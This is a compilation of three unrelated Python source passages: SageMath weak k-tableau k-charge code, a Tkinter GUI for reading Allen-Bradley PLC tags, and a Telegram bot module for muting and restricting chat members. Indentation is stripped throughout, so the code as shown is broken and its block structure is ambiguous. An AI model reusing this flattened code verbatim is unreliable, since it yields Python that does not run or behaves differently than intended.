- a list of lists of coordinates
.. WARNING::
This method currently only works for straight weak tableaux with partition
weight.
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: t.list_of_standard_cells()
[[(0, 1), (1, 0), (2, 0)], [(0, 0), (0, 2), (1, 1)]]
sage: t = WeakTableau([[1, 1, 1, 2], [2, 2, 3]], 5)
sage: t.list_of_standard_cells()
[[(0, 2), (1, 1), (1, 2)], [(0, 1), (1, 0)], [(0, 0), (0, 3)]]
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: t.list_of_standard_cells()
[[(0, 1), (1, 0), (2, 0), (0, 5), (3, 0), (4, 0), (5, 0)], [(0, 0), (0, 2), (1, 1), (2, 1), (1, 2), (3, 1)]]
TESTS::
sage: t = WeakTableau([],3)
sage: t.list_of_standard_cells()
[]
sage: t = WeakTableau([[None, None, 2, 3, 4], [1, 4], [2]], 3)
sage: t.list_of_standard_cells()
Traceback (most recent call last):
...
ValueError: This method only works for straight tableaux!
sage: t = WeakTableau([[1,2],[2]], 3)
sage: t.list_of_standard_cells()
Traceback (most recent call last):
...
ValueError: This method only works for weak tableaux with partition weight!
"""
if self.parent()._skew:
raise ValueError("This method only works for straight tableaux!")
if self.weight() not in Partitions(sum(self.weight())):
raise ValueError("This method only works for weak tableaux with partition weight!")
if not self:
return []
mu = Partition(self.weight()).conjugate()
already_used = []
out = []
for i in range(self[0].count(1)):
standard_cells = [(0,self[0].count(1) - i - 1)]
r = self[0].count(1) - i - 1
for v in range(1,mu[i]):
D = self.dictionary_of_coordinates_at_residues(v+1)
new_D = {a: b for (a, b) in D.items()
if all(x not in already_used for x in b)}
r = (r - min([self.k+1 - (x-r)%(self.k+1) for x in new_D]))%(self.k+1)
standard_cells.append(new_D[r][-1])
already_used += new_D[r]
out.append(standard_cells)
return out
def k_charge(self, algorithm = "I"):
r"""
Return the `k`-charge of ``self``.
INPUT:
- ``algorithm`` -- (default: "I") if "I", computes `k`-charge using the `I`
algorithm, otherwise uses the `J`-algorithm
OUTPUT:
- a nonnegative integer
For the definition of `k`-charge and the various algorithms to compute it see
Section 3.3 of [LLMSSZ2013]_.
.. SEEALSO:: :meth:`k_charge_I` and :meth:`k_charge_J`
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: t.k_charge()
2
sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
sage: t.k_charge()
8
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: t.k_charge()
12
TESTS::
sage: T = WeakTableaux(4, [13,9,5,3,2,1,1], [4,3,3,2,2,1,1,1])
sage: T.cardinality()
6
sage: all(t.k_charge_I() == t.k_charge_J() for t in T)
True
"""
if algorithm == "I":
return self.k_charge_I()
return self.k_charge_J()
def k_charge_I(self):
r"""
Return the `k`-charge of ``self`` using the `I`-algorithm.
For the definition of `k`-charge and the `I`-algorithm see Section 3.3 of [LLMSSZ2013]_.
OUTPUT:
- a nonnegative integer
.. SEEALSO:: :meth:`k_charge` and :meth:`k_charge_J`
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: t.k_charge_I()
2
sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
sage: t.k_charge_I()
8
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: t.k_charge_I()
12
TESTS::
sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
sage: t.k_charge_I()
Traceback (most recent call last):
...
ValueError: k-charge is not defined for skew weak tableaux
"""
if self.parent()._skew:
raise ValueError("k-charge is not defined for skew weak tableaux")
stt = self.list_of_standard_cells()
kch = 0
for sw in stt:
Ii = 0
for r in range(len(sw)-1):
if sw[r][1] < sw[r+1][1]:
Ii += 1 + abs(self.parent().diag(sw[r+1],sw[r]))
else:
Ii += - abs(self.parent().diag(sw[r],sw[r+1]))
kch += Ii
return kch
def k_charge_J(self):
r"""
Return the `k`-charge of ``self`` using the `J`-algorithm.
For the definition of `k`-charge and the `J`-algorithm see Section 3.3 of [LLMSSZ2013]_.
OUTPUT:
- a nonnegative integer
.. SEEALSO:: :meth:`k_charge` and :meth:`k_charge_I`
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: t.k_charge_J()
2
sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
sage: t.k_charge_J()
8
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: t.k_charge_J()
12
TESTS::
sage: t = WeakTableau([[None, None, 1, 1, 4], [1, 4], [3]], 3)
sage: t.k_charge_I()
Traceback (most recent call last):
...
ValueError: k-charge is not defined for skew weak tableaux
sage: t = WeakTableau([[1, 1, 2, 3], [2, 4, 4], [3, 6], [5]], 4, representation='bounded')
sage: t.k_charge() == t.k_charge(algorithm = 'J')
True
"""
if self.parent()._skew:
raise ValueError("k-charge is not defined for skew weak tableaux")
stt = self.list_of_standard_cells()
kch = 0
for sw in stt:
Ji = 0
for i in range(len(sw)-1):
c = (self._height_of_restricted_subword(sw,i+2)+1,0)
cdi = self.parent().circular_distance((-c[0])%(self.k+1),(sw[i][1]-sw[i][0])%(self.k+1))
cdi1 = self.parent().circular_distance((-c[0])%(self.k+1),(sw[i+1][1]-sw[i+1][0])%(self.k+1))
if (cdi > cdi1):
Ji += 1
kch += Ji + self.parent().diag(sw[i+1],c)
return kch
def _height_of_restricted_subword(self, sw, r):
r"""
Return the row of the highest addable cell of the subtableau of ``self`` with letters `\le r`
(excluding letters `r` in standard subwords before ``sw``).
Restrict the weak `k`-tableau ``self`` to letters `\le r` and remove all letters
`r` that appeared in a previous standard subword selected by
:meth:`list_of_standard_cells`.
INPUT:
- ``sw`` -- one of the subwords of standard cells of ``self``
- ``r`` -- nonnegative integer
OUTPUT:
- a nonnegative integer
EXAMPLES::
sage: t = WeakTableau([[1, 1, 2, 2, 3], [2, 3], [3]], 3)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 1), (1, 0), (2, 0)]
sage: t._height_of_restricted_subword(s,2)
1
sage: t = WeakTableau([[1, 3, 4, 5, 6], [2, 6], [4]], 3)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 0), (1, 0), (0, 1), (2, 0), (0, 3), (1, 1)]
sage: t._height_of_restricted_subword(s,4)
2
sage: t = WeakTableau([[1, 1, 2, 3, 4, 4, 5, 5, 6], [2, 3, 5, 5, 6], [3, 4, 7], [5, 6], [6], [7]], 4)
sage: s = t.list_of_standard_cells()[0]; s
[(0, 1), (1, 0), (2, 0), (0, 5), (3, 0), (4, 0), (5, 0)]
sage: t._height_of_restricted_subword(s,6)
4
"""
R = [v for v in self.shape().to_partition().cells() if self[v[0]][v[1]] < r]
L = [v for v in sw if self[v[0]][v[1]] <= r]
return max(v[0] for v in L+R)
class WeakTableaux_core(WeakTableaux_abstract):
r"""
The class of (skew) weak `k`-tableaux in the core representation of shape ``shape``
(as `k+1`-core) and weight ``weight``.
INPUT:
- ``k`` -- positive integer
- ``shape`` -- the shape of the `k`-tableaux represented as a `(k+1)`-core; if the
tableaux are skew, the shape is a tuple of the outer and inner shape (both as
`(k+1)`-cores)
- ``weight`` -- the weight of the `k`-tableaux
EXAMPLES::
sage: T = WeakTableaux(3, [4,1], [2,2])
sage: T.list()
[[[1, 1, 2, 2], [2]]]
sage: T = WeakTableaux(3, [[5,2,1], [2]], [1,1,1,1])
sage: T.list()
[[[None, None, 2, 3, 4], [1, 4], [2]],
[[None, None, 1, 2, 4], [2, 4], [3]],
[[None, None, 1, 2, 3], [2, 3], [4]]]
"""
@staticmethod
def __classcall_private__(cls, k, shape, weight):
r"""
Straighten arguments before unique representation.
TESTS::
sage: from sage.combinat.k_tableau import WeakTableaux_core
sage: T = WeakTableaux_core(3, [2,1], [1,1,1])
sage: TestSuite(T).run()
sage: T = WeakTableaux_core(3, [[5,2,1], [2]], [1,1,1,1])
sage: TestSuite(T).run()
"""
if shape == [] or shape[0] in ZZ:
shape = (Core(shape, k+1), Core([],k+1))
else:
shape = tuple([Core(r,k+1) for r in shape])
return super(WeakTableaux_core, | |
<filename>plctag_gui.py
'''
Create a simple Tkinter window to display fetched tags and selected tag value(s).
Tkinter doesn't come preinstalled on all Linux distributions, so you may need to install it.
For Ubuntu: sudo apt-get install python-tk
Tkinter vs tkinter
Reference: https://stackoverflow.com/questions/17843596/difference-between-tkinter-and-tkinter
Window/widget resizing
Reference: https://stackoverflow.com/questions/22835289/how-to-get-tkinter-canvas-to-dynamically-resize-to-window-width
'''
import threading
import platform
import time
import math
import re as regexp # regular expressions
from libplctag import *
try:
# Python 2
from Tkinter import *
except ImportError:
# Python 3
from tkinter import *
import tkinter.font as tkfont
pythonVersion = platform.python_version()
# if setting myTag for startup then also set the correct value of myTagDataType
currentPLC = 'controllogix'
ipAddress = '192.168.1.15'
path = '1,3'
myTag = 'CT_BOOLArray_1[0]{5}'
myTagDataType = 'bool array'
timeout = 10000
ab_plc_type = ['controllogix', 'micrologix', 'logixpccc', 'micro800', 'slc500', 'plc5', 'njnx']
ab_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64', 'float32', 'float64', 'bool', 'bool array', 'string', 'custom string', 'timer', 'counter', 'control']
ab_mlgx_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64', 'float32', 'float64', 'string', 'timer', 'counter', 'control', 'pid']
ab_slcplc5_data_type = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64','float32', 'float64', 'string', 'timer', 'counter', 'control']
timer_bits_words = ['None', 'EN', 'TT', 'DN', 'PRE', 'ACC']
counter_bits_words = ['None', 'CU', 'CD', 'DN', 'OV', 'UN', 'UA', 'PRE', 'ACC']
control_bits_words = ['None', 'EN', 'EU', 'DN', 'EM', 'ER', 'UL', 'IN', 'FD', 'LEN', 'POS']
pid_bits_words = ['None', 'TM', 'AM', 'CM', 'OL', 'RG', 'SC', 'TF', 'DA', 'DB', 'UL', 'LL', 'SP', 'PV', 'DN', 'EN', 'SPS', 'KC', 'Ti', 'TD', 'MAXS', 'MINS', 'ZCD', 'CVH', 'CVL', 'LUT', 'SPV', 'CVP']
bits_8bit = ['None', '0', '1', '2', '3', '4', '5', '6', '7']
bits_16bit = ['None', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15']
bits_32bit = ['None', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31']
bits_64bit = ['None', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63']
string_length = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50']
bool_display = ['T : F', '1 : 0', 'On : Off']
# width wise resizing of the label displaying tag value (window)
class LabelResizing(Label):
def __init__(self,parent,**kwargs):
Label.__init__(self,parent,**kwargs)
self.bind("<Configure>", self.on_resize)
self.width = self.winfo_reqwidth()
def on_resize(self,event):
if self.width > 0:
self.width = int(event.width)
self.config(width=self.width, wraplength=self.width)
# width wise resizing of the tag entry box (window)
class EntryResizing(Entry):
def __init__(self,parent,**kwargs):
Entry.__init__(self,parent,**kwargs)
self.bind("<Configure>", self.on_resize)
self.width = self.winfo_reqwidth()
def on_resize(self,event):
if self.width > 0:
self.width = int(event.width)
self.config(width=self.width)
class connection_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
comm_check()
class get_tags_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
getTags()
class update_thread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
start_update_value()
plctagVersion = ''
def main():
'''
Create our window and comm driver
'''
global root
global tagID
global currentTag
global stringTag
global tagValue
global realElementCount
global selectedPath
global selectedIPAddress
global selectedPLC
global selectedDataType
global selectedPID
global selectedTCC
global selectedBit
global selectedStringLength
global selectedTag
global selectedBoolDisplay
global selectedProgramName
global updateRunning
global connectionInProgress
global connected
global bitIndex
global pidElement
global tccElement
global tccType
global plctagVersion
global offset
global lblTagStatus
global btnStart
global btnStop
global btnGetTags
global lbPLC
global lbDataType
global lbPID
global lbTCC
global lbBit
global lbStringLength
global lbBoolDisplay
global lbTags
global tbPLC
global tbDataType
global tbPID
global tbBit
global tbStringLength
global tbIPAddress
global tbPath
global tbTag
global tbProgramName
global popup_menu_tbIPAddress
global popup_menu_tbPath
global popup_menu_tbTag
global popup_menu_tbProgramName
root = Tk()
root.config(background='#837DFF')
root.title('Plctag GUI - Connection/Read Tester (Python v' + pythonVersion + ')')
root.geometry('800x600')
connected, connectionInProgress, updateRunning = False, False, True
currentTag, tccType, tccElement, pidElement, plctagVersion = myTag, '', 'None', 'None', ''
bitIndex, tagID, realElementCount = -1, -1, 0
#-------------------------------------------------------------------------------------------
# add a frame to hold top widgets
frame1 = Frame(root, background='#837DFF')
frame1.pack(fill=X)
# add listboxes for PLCs, DataTypes, PID, Timer/Counter/Control, Bits, Custom String Length, Bool Display and Tags
lbPLC = Listbox(frame1, height=11, width=12, bg='lightblue')
lbDataType = Listbox(frame1, height=11, width=13, bg='lightblue')
lbPID = Listbox(frame1, height=11, width=6, bg='lightblue')
lbTCC = Listbox(frame1, height=11, width=6, bg='lightblue')
lbBit = Listbox(frame1, height=11, width=6, bg='lightblue')
lbStringLength = Listbox(frame1, height=11, width=5, bg='lightblue')
lbBoolDisplay = Listbox(frame1, height=11, width=9, bg='lightblue')
lbTags = Listbox(frame1, height=11, width=50, bg='lightgreen')
lbPLC.insert(1, '~ PLC')
i = 2
for plc in ab_plc_type:
lbPLC.insert(i, plc)
i = i + 1
lbPLC.pack(anchor='n', side='left', padx=2, pady=3)
# select PLC on the mouse double-click
lbPLC.bind('<Double-Button-1>', lambda event: plc_select())
lbDataType.insert(1, '~ Data Type')
i = 2
for dataType in ab_data_type:
lbDataType.insert(i, dataType)
i = i + 1
lbDataType.pack(anchor='n', side='left', padx=2, pady=3)
# select Data Type on the mouse double-click
lbDataType.bind('<Double-Button-1>', lambda event: data_type_select())
# add scrollbar for the DataTypes list box
scrollbarDataTypes = Scrollbar(frame1, orient='vertical', width=12, command=lbDataType.yview)
scrollbarDataTypes.pack(anchor='n', side='left', pady=3, ipady=65)
lbDataType.config(yscrollcommand = scrollbarDataTypes.set)
# conditional addition of MicroLogix PID list box, for plctag library version lower than 2.2.0
if plc_tag_check_lib_version(2, 2, 0) != 0:
lbPID.insert(1, '~ PID')
i = 2
for pid in pid_bits_words:
lbPID.insert(i, pid)
i = i + 1
lbPID.pack(anchor='n', side='left', padx=3, pady=3)
if myTagDataType == 'pid':
lbPID['state'] = 'normal'
else:
lbPID['state'] = 'disabled'
# select PID on the mouse double-click
lbPID.bind('<Double-Button-1>', lambda event: pid_select())
# add scrollbar for the PID list box
scrollbarPID = Scrollbar(frame1, orient='vertical', width=12, command=lbPID.yview)
scrollbarPID.pack(anchor='n', side='left', pady=3, ipady=65)
lbPID.config(yscrollcommand = scrollbarPID.set)
lbTCC.insert(1, '~ TCC')
i = 2
for tccELMNT in timer_bits_words:
lbTCC.insert(i, tccELMNT)
i = i + 1
lbTCC.pack(anchor='n', side='left', padx=2, pady=3)
if myTagDataType == 'timer' or myTagDataType == 'counter' or myTagDataType == 'control':
lbTCC['state'] = 'normal'
else:
lbTCC['state'] = 'disabled'
# select TCC element on the mouse double-click
lbTCC.bind('<Double-Button-1>', lambda event: tcc_select())
# add scrollbar for the TCC list box
scrollbarTCC = Scrollbar(frame1, orient='vertical', width=12, command=lbTCC.yview)
scrollbarTCC.pack(anchor='n', side='left', pady=3, ipady=65)
lbTCC.config(yscrollcommand = scrollbarTCC.set)
lbBit.insert(1, '~ Bit')
i = 2
for bit in bits_8bit:
lbBit.insert(i, bit)
i = i + 1
lbBit.pack(anchor='n', side='left', padx=3, pady=3)
if regexp.match('.int.+', myTagDataType) or regexp.match('int.+', myTagDataType) or regexp.match('float.+', myTagDataType):
lbBit['state'] = 'normal'
else:
lbBit['state'] = 'disabled'
# select Bit on the mouse double-click
lbBit.bind('<Double-Button-1>', lambda event: bit_select())
# add scrollbar for the Bit list box
scrollbarBit = Scrollbar(frame1, orient='vertical', width=12, command=lbBit.yview)
scrollbarBit.pack(anchor='n', side='left', pady=3, ipady=65)
lbBit.config(yscrollcommand = scrollbarBit.set)
lbStringLength.insert(1, '~ Str')
i = 2
for strLength in string_length:
lbStringLength.insert(i, strLength)
i = i + 1
lbStringLength.pack(anchor='n', side='left', padx=3, pady=3)
if myTagDataType == 'custom string':
lbStringLength['state'] = 'normal'
else:
lbStringLength['state'] = 'disabled'
# select string length on the mouse double-click
lbStringLength.bind('<Double-Button-1>', lambda event: string_length_select())
# add scrollbar for the string length listbox
scrollbarStringLength = Scrollbar(frame1, orient='vertical', width=12, command=lbStringLength.yview)
scrollbarStringLength.pack(anchor='n', side='left', pady=3, ipady=65)
lbStringLength.config(yscrollcommand = scrollbarStringLength.set)
lbBoolDisplay.insert(1, '~ Bool')
i = 2
for boolDisplay in bool_display:
lbBoolDisplay.insert(i, boolDisplay)
i = i + 1
lbBoolDisplay.pack(anchor='n', side='left', padx=3, pady=3)
# select boolean display format on the mouse double-click
lbBoolDisplay.bind('<Double-Button-1>', lambda event: bool_display_select())
# add scrollbar for the Tags list box
scrollbarTags = Scrollbar(frame1, orient='vertical', width=12, command=lbTags.yview)
scrollbarTags.pack(anchor='n', side='right', padx=3, pady=3, ipady=65)
lbTags.config(yscrollcommand = scrollbarTags.set)
# copy selected tag to the clipboard on the mouse double-click
lbTags.bind('<Double-Button-1>', lambda event: tag_copy())
lbTags.pack(anchor='n', side='right', pady=3)
#-------------------------------------------------------------------------------------------
# add a frame to hold labels, Program Name entry box and Get Tags button
frame2 = Frame(root, background='#837DFF')
frame2.pack(fill=X)
# add text boxes to serve as labels showing currently selected PLC, DataType, PID, Bit, StringLength and BoolDisplay
selectedPLC = StringVar()
tbPLC = Entry(frame2, justify='center', textvariable=selectedPLC, width=12, fg='blue', state='readonly')
selectedPLC.set(currentPLC)
tbPLC.pack(side='left', padx=2, pady=1)
selectedDataType = StringVar()
tbDataType = Entry(frame2, justify='center', textvariable=selectedDataType, width=13, fg='blue', state='readonly')
if myTagDataType == '':
selectedDataType.set('int8')
else:
selectedDataType.set(myTagDataType)
tbDataType.pack(side='left', padx=2, pady=1)
# offsets used for positioning TCC, Bit, String Length and Bool Display list boxes (when PID list box is not included)
offsetTCCBox = 9
offsetBitBox = -7
offsetStringLengthBox = 5
offsetBoolBox = -4
# conditional addition of the | |
import html
from typing import Optional, List
from telegram import Message, Chat, Update, Bot, User
from telegram.error import BadRequest
from telegram.ext import CommandHandler, Filters
from telegram.ext.dispatcher import run_async
from telegram.utils.helpers import mention_html
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ParseMode, User, CallbackQuery
from haruka import dispatcher, LOGGER, SUDO_USERS
from haruka.modules.helper_funcs.chat_status import bot_admin, user_admin, is_user_admin, can_restrict
from haruka.modules.helper_funcs.extraction import extract_user, extract_user_and_text
from haruka.modules.helper_funcs.string_handling import extract_time
from haruka.modules.log_channel import loggable
from haruka.modules.translations.strings import tld
from haruka.modules.connection import connected
from haruka.modules.disable import DisableAbleCommandHandler
@run_async
@bot_admin
@user_admin
@loggable
def mute(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id = extract_user(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You'll need to either give me a username to mute, or reply to someone to be muted."))
return ""
if user_id == bot.id:
message.reply_text(tld(chat.id, "I'm not muting myself!"))
return ""
member = chatD.get_member(int(user_id))
if member:
if user_id in SUDO_USERS:
message.reply_text(tld(chat.id, "No! I'm not muting bot sudoers! That would be a pretty dumb idea."))
elif is_user_admin(chatD, user_id, member=member):
message.reply_text(tld(chat.id, "No! I'm not muting chat administrator! That would be a pretty dumb idea."))
elif member.can_send_messages is None or member.can_send_messages:
bot.restrict_chat_member(chatD.id, user_id, can_send_messages=False)
keyboard = []
reply = tld(chat.id, "{} is muted in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
return "<b>{}:</b>" \
"\n#MUTE" \
"\n<b>Admin:</b> {}" \
"\n<b>User:</b> {}".format(html.escape(chatD.title),
mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name))
else:
message.reply_text(tld(chat.id, "This user is already muted in {}!").format(chatD.title))
else:
message.reply_text(tld(chat.id, "This user isn't in the {}!").format(chatD.title))
return ""
@run_async
@bot_admin
@user_admin
@loggable
def unmute(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id = extract_user(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You'll need to either give me a username to unmute, or reply to someone to be unmuted."))
return ""
member = chatD.get_member(int(user_id))
if member.status != 'kicked' and member.status != 'left':
if member.can_send_messages and member.can_send_media_messages \
and member.can_send_other_messages and member.can_add_web_page_previews:
message.reply_text(tld(chat.id, "This user already has the right to speak in {}.").format(chatD.title))
else:
bot.restrict_chat_member(chatD.id, int(user_id),
can_send_messages=True,
can_send_media_messages=True,
can_send_other_messages=True,
can_add_web_page_previews=True)
keyboard = []
reply = tld(chat.id, "Yep, {} can start talking again in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
return "<b>{}:</b>" \
"\n#UNMUTE" \
"\n<b>• Admin:</b> {}" \
"\n<b>• User:</b> {}" \
"\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), user_id)
else:
message.reply_text(tld(chat.id, "This user isn't even in the chat, unmuting them won't make them talk more than they "
"already do!"))
return ""
@run_async
@bot_admin
@can_restrict
@user_admin
@loggable
def temp_mute(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id, reason = extract_user_and_text(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You don't seem to be referring to a user."))
return ""
try:
member = chat.get_member(user_id)
except BadRequest as excp:
if excp.message == "User not found":
message.reply_text(tld(chat.id, "I can't seem to find this user"))
return ""
else:
raise
if is_user_admin(chat, user_id, member):
message.reply_text(tld(chat.id, "I really wish I could mute admins..."))
return ""
if user_id == bot.id:
message.reply_text(tld(chat.id, "I'm not gonna MUTE myself, are you crazy?"))
return ""
if not reason:
message.reply_text(tld(chat.id, "You haven't specified a time to mute this user for!"))
return ""
split_reason = reason.split(None, 1)
time_val = split_reason[0].lower()
if len(split_reason) > 1:
reason = split_reason[1]
else:
reason = ""
mutetime = extract_time(message, time_val)
if not mutetime:
return ""
log = "<b>{}:</b>" \
"\n#TEMP MUTED" \
"\n<b>Admin:</b> {}" \
"\n<b>User:</b> {}" \
"\n<b>Time:</b> {}".format(html.escape(chat.title), mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), time_val)
if reason:
log += "\n<b>Reason:</b> {}".format(reason)
try:
if member.can_send_messages is None or member.can_send_messages:
bot.restrict_chat_member(chat.id, user_id, until_date=mutetime, can_send_messages=False)
message.reply_text(tld(chat.id, "Muted for {} in {}!").format(time_val, chatD.title))
return log
else:
message.reply_text(tld(chat.id, "This user is already muted in {}!").format(chatD.title))
except BadRequest as excp:
if excp.message == "Reply message not found":
# Do not reply
message.reply_text(tld(chat.id, "Muted for {} in {}!").format(time_val, chatD.title), quote=False)
return log
else:
LOGGER.warning(update)
LOGGER.exception("ERROR muting user %s in chat %s (%s) due to %s", user_id, chat.title, chat.id,
excp.message)
message.reply_text(tld(chat.id, "Well damn, I can't mute that user."))
return ""
@run_async
@bot_admin
@user_admin
@loggable
def nomedia(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id = extract_user(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You'll need to either give me a username to restrict, or reply to someone to be restricted."))
return ""
if user_id == bot.id:
message.reply_text(tld(chat.id, "I'm not restricting myself!"))
return ""
member = chatD.get_member(int(user_id))
if member:
if is_user_admin(chatD, user_id, member=member):
message.reply_text(tld(chat.id, "Afraid I can't restrict admins!"))
elif member.can_send_messages is None or member.can_send_messages:
bot.restrict_chat_member(chatD.id, user_id, can_send_messages=True,
can_send_media_messages=False,
can_send_other_messages=False,
can_add_web_page_previews=False)
keyboard = []
reply = tld(chat.id, "{} is restricted from sending media in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
return "<b>{}:</b>" \
"\n#RESTRICTED" \
"\n<b>• Admin:</b> {}" \
"\n<b>• User:</b> {}" \
"\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), user_id)
else:
message.reply_text(tld(chat.id, "This user is already restricted in {}!"))
else:
message.reply_text(tld(chat.id, "This user isn't in the {}!").format(chatD.title))
return ""
@run_async
@bot_admin
@user_admin
@loggable
def media(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id = extract_user(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You'll need to either give me a username to unrestrict, or reply to someone to be unrestricted."))
return ""
member = chatD.get_member(int(user_id))
if member.status != 'kicked' and member.status != 'left':
if member.can_send_messages and member.can_send_media_messages \
and member.can_send_other_messages and member.can_add_web_page_previews:
message.reply_text(tld(chat.id, "This user already has the rights to send anything in {}.").format(chatD.title))
else:
bot.restrict_chat_member(chatD.id, int(user_id),
can_send_messages=True,
can_send_media_messages=True,
can_send_other_messages=True,
can_add_web_page_previews=True)
keyboard = []
reply = tld(chat.id, "Yep, {} can send media again in {}!").format(mention_html(member.user.id, member.user.first_name), chatD.title)
message.reply_text(reply, reply_markup=keyboard, parse_mode=ParseMode.HTML)
return "<b>{}:</b>" \
"\n#UNRESTRICTED" \
"\n<b>• Admin:</b> {}" \
"\n<b>• User:</b> {}" \
"\n<b>• ID:</b> <code>{}</code>".format(html.escape(chatD.title),
mention_html(user.id, user.first_name),
mention_html(member.user.id, member.user.first_name), user_id)
else:
message.reply_text(tld(chat.id, "This user isn't even in the chat, unrestricting them won't make them send anything than they "
"already do!"))
return ""
@run_async
@bot_admin
@can_restrict
@user_admin
@loggable
def temp_nomedia(bot: Bot, update: Update, args: List[str]) -> str:
chat = update.effective_chat # type: Optional[Chat]
user = update.effective_user # type: Optional[User]
message = update.effective_message # type: Optional[Message]
conn = connected(bot, update, chat, user.id)
if not conn == False:
chatD = dispatcher.bot.getChat(conn)
else:
if chat.type == "private":
exit(1)
else:
chatD = chat
user_id, reason = extract_user_and_text(message, args)
if not user_id:
message.reply_text(tld(chat.id, "You don't seem to be referring to a user."))
return ""
try:
member = chat.get_member(user_id)
except BadRequest as excp:
if excp.message == "User not found":
message.reply_text(tld(chat.id, "I can't seem to find this user"))
return ""
else:
raise
if is_user_admin(chat, user_id, member):
message.reply_text(tld(chat.id, "I really wish I could restrict admins..."))
return ""
if user_id == bot.id:
message.reply_text(tld(chat.id, "I'm not gonna RESTRICT myself, are you crazy?"))
return ""
if not reason:
message.reply_text(tld(chat.id, "You haven't specified a time to restrict this user for!"))
return ""
split_reason = reason.split(None, 1)
time_val = split_reason[0].lower()
if len(split_reason) > 1:
